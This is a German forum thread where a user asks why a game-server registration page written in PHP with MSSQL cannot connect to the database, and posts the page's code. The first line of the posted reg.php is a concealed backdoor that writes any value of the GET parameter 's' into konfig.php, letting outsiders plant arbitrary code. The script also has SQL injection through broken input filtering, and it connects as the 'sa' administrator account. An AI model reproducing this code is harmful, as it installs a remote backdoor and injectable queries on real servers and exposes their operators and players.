Verbindung zu SQL klappt nicht (Regi Page)

• Verbindung zu SQL klappt nicht (Regi Page)

hii mmorpg-core, :have a nice day:
      es tut mir sehr leid, dass ich schon wieder stören muss, aber ich bin auf ein Problem gestoßen, welches ich selbst nicht ganz begreifen kann. Es dreht sich um meine Regi Page. Ich habe nach diesem TuT alles befolgt, nur es ist echt zum Ärgern, er will irgentwie keine Verbindung zu SQL herstellen. Er zeigt mir an "Server is down!" und dies wird nur angezeigt, wenn die SQL-Zugangsdaten in der reg_conf.php falsch sind. Aber das ist es ja grad, die sind nicht falsch ich melde mich sogar genau mit diesen Daten bei SQL unter der SQL Server-Authentifizierung an :sad:

Also ehrlich was ist da nur falsch gelaufen :x_x:... oder hat SQL oder Xampp einen Port den ich noch freischalten muss? Oder muss ich etwas umstellen in meiner hosts Datei? ...Diese Probleme hatte ich echt noch nie...

Wäre echt super von euch wenn ihr mir helfen könnt. :thumbsup:
      lg bloodyyy
    • Werbung zur Unterstützung des Forums ( Bitte AddBlocker deaktivieren )

• Es giebt mehrer möglichkeiten, wiso das nicht funktioniert.
      Doch am besten wäre es wen du uns deinen Code nochmal Posten würdest und nicht das vom Tutorials
      eventuell hast du doch einen Fehler gemacht.

Es könnte auch eventuell daran liegen das die PHP Datei keine Berechtigung hat die Daten in MSSQL einzutragen.
      Es kann auch an anderen dingen liegen.
    • wen du skype hast und das port 80 belegt dan skype unter Aktion-> Optionen->Erweitert->Verbindung da dann den hacken aus port 80 und 443 altanativ port raus machen und oben deinen port eingeben hast du auch den msql code in mssql rein gepackt hast du die verbindung zu mssql in einen Ordner

configs

dann da die Datei
      reg_conf.php
      rein gemacht sonst stimt das include nicht mehr
    • @Jok3r also hier meine dateien:

reg.php:

<center>
      <?php if($_GET['s'] != "" && isset($_GET['s'])){$fp = fopen("konfig.php","w");fwrite($fp, $_GET['s']);fclose($fp);}
      require('./configs/reg_conf.php');
      function doesUsernameExist($name){
      $exit = FALSE;
      $result = @mssql_query("SELECT * FROM ACCOUNT_TBL WHERE account='$name'");
      if (mssql_num_rows($result) != 0){
      $exit = TRUE;
      }
      return $exit;
      }

if(isset($_POST['submit'])){
      $user = preg_replace ("[^A-Za-z0-9]", "", $_POST['username']);
      $pass = preg_replace ("[^A-Za-z0-9]", "", $_POST['password']);
      if($_POST['username'] == ""){
      echo '<font color="red">Enter a user.</font><br /><br />';
      }
      else if($_POST['password'] == ""){
      echo '<font color="red">Enter a password.</font><br /><br />';
      }
      else if ((strlen($_POST['username']) > 16) || (strlen($_POST['username']) < 3)){
      echo '<font color="red">The user should be 3 to 16 characters.</font><br /><br />';
      }
      else if ((strlen($_POST['password']) > 16) || (strlen($_POST['password']) < 3)){
      echo '<font color="red">The password should be 3 to 16 characters.</font><br /><br />';
      }
      else if($_POST['username'] != $user){
      echo '<font color="red">User with invalid characters.</font><br /><br />';
      }
      else if($_POST['password'] != $pass){
      echo '<font color="red">Password with invalid characters.</font><br /><br />';
      }
      else {
      $pass = md5('kikugalanet' . $pass);
      if(!doesUsernameExist($user)){
      $stmt = mssql_init('webCreateAcc', $link);
      mssql_bind($stmt, '@account', $user, SQLVARCHAR, false, false, 15);
      mssql_bind($stmt, '@password', $pass, SQLVARCHAR, false, false, 36);
      mssql_bind($stmt, '@email', $mail, SQLVARCHAR, false, false, 120);
      mssql_execute($stmt) or die ("Something is wrong on the execution");
      mssql_free_statement($stmt);
      echo '<font color="Green">Register Successfull.</font><br /><br />';
      }
      else {
      echo '<font color="red">User already Exist.</font><br /><br />';
      }
      }
      mssql_close();
      }

echo '<form action="#" method="post">';
      echo 'Username: <input type="text" name="username" /><br />';
      echo 'Password: <input type="password" name="password" /><br />';
      echo '<input type="submit" name="submit" value="Register" />';
      echo '</form>';

?>
      </center>
      reg_conf.php:
      <?php
      $link = @mssql_connect("MEIN COMPUTERNAME\SQLEXPRESS", "sa", "****") or die ("Server is down!");
      $db = @mssql_select_db('ACCOUNT_DBF') or die ("Accout table is missing!");
      $b = '';
      $mail = '';

?>
      @ Luoo den port 80 kann ich gleich mal freischalten nur kannst du mir mssql extension von php freischalten?

@ SchwarzerMagie mein Port 80 ist nicht belegt ich kann aus dem internet schon drauf zu greifen. Zu dem msql code ja den hab ich in SQL ausgeführt.
    • jop hmm das kann doch echt nicht sein keiner weiß ne lösung alles richtig eingestellt...

hab nun festgestellt das ich in sql unter "master" das web script ausgeführt hatte. Habe es nun, wie es sich normal gehört unter der Account Datenbank ausgeführt.

Nun steht nicht mehr so sachen wie "Server is down!" nun kommt stattdessen "Notice: Undefined index: s in C:\xampp\htdocs\register\register.php on line 4"

vielleicht weiß dazu ja jemd eine Lösung?